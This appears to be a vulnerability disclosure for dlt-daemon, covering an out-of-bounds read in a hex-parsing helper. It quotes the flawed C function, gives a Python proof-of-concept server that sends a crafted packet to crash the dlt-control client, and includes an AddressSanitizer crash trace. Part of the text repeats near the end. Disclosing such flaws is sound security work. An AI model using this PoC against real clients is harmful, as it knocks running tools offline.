Summary
The parsing API located in is vulnerable to an Out-of-Bounds (OOB) Read vulnerability that leads to a client-side Remote Denial of Service (DoS) / Process Crash.
|
uint16_t dlt_getloginfo_conv_ascii_to_uint16_t(char *rp, int *rp_count) |
|
{ |
|
char num_work[5] = { 0 }; |
|
char *endptr; |
|
|
|
if ((rp == NULL) || (rp_count == NULL)) |
|
return (uint16_t)0xFFFF; |
|
|
|
/* ------------------------------------------------------ |
|
* from: [89 13 ] -> to: ['+0x'1389\0] -> to num |
|
* ------------------------------------------------------ */ |
|
num_work[0] = *(rp + *rp_count + 3); |
|
num_work[1] = *(rp + *rp_count + 4); |
|
num_work[2] = *(rp + *rp_count + 0); |
|
num_work[3] = *(rp + *rp_count + 1); |
|
num_work[4] = 0; |
|
*rp_count += 6; |
|
|
|
return (uint16_t)strtol(num_work, &endptr, 16); |
|
} |
The core issue stems from an absolute reliance on the control value managed via the pointer offset to parse hex-encoded elements from the incoming string buffer . The function performs multiple lookahead read operations without performing a boundary check against the actual physical storage capacity or string length of the buffer.
PoC
import socket
import struct
import time
HOST = '127.0.0.1'
PORT = 3490
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_sock:
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_sock.bind((HOST, PORT))
server_sock.listen(1)
conn, addr = server_sock.accept()
with conn:
std_header = b"\x21\x00\x00\x15"
ext_header = b"\x26\x01" + b"APP\x00" + b"CON\x00"
payload = b"\x03\x00\x00\x00" + b"\x07" + b"\xff\xff"
full_packet = std_header + ext_header + payload
conn.sendall(full_packet)
time.sleep(1)
Reproduction Steps
$ python3 server.py
$ dlt-control -j 127.0.0.1
=================================================================
==529418==ERROR: AddressSanitizer: SEGV on unknown address 0x5c45d2953000 (pc 0x7caa9aed491b bp 0x000000000000 sp 0x7ffdeb45e4c0 T0)
==529418==The signal is caused by a READ memory access.
#0 0x7caa9aed491b in dlt_getloginfo_conv_ascii_to_uint16_t /root/dlt-daemon/src/shared/dlt_common.c:6210
#1 0x7caa9aec785d in dlt_client_parse_get_log_info_resp_text /root/dlt-daemon/src/lib/dlt_client.c:2123
#2 0x5c45d2936ca0 in dlt_receive_message_callback /root/dlt-daemon/src/console/dlt-control.c:842
#3 0x7caa9aec5803 in dlt_client_main_loop /root/dlt-daemon/src/lib/dlt_client.c:569
#4 0x5c45d2932440 in dlt_process_get_log_info /root/dlt-daemon/src/console/dlt-control.c:203
#5 0x5c45d293613c in main /root/dlt-daemon/src/console/dlt-control.c:744
#6 0x7caa9acc51c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#7 0x7caa9acc528a in __libc_start_main_impl ../csu/libc-start.c:360
#8 0x5c45d2931c64 in _start (/root/dlt-daemon/build/src/console/dlt-control+0x6c64) (BuildId: 10320e967762979391e0299dd7545938abfceb5b)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/dlt-daemon/src/shared/dlt_common.c:6210 in dlt_getloginfo_conv_ascii_to_uint16_t
==529418==ABORTING
Summary
The parsing API located in is vulnerable to an Out-of-Bounds (OOB) Read vulnerability that leads to a client-side Remote Denial of Service (DoS) / Process Crash.
dlt-daemon/src/shared/dlt_common.c
Lines 6199 to 6218 in b84dbc0
The core issue stems from an absolute reliance on the control value managed via the pointer offset to parse hex-encoded elements from the incoming string buffer . The function performs multiple lookahead read operations without performing a boundary check against the actual physical storage capacity or string length of the buffer.
PoC
Reproduction Steps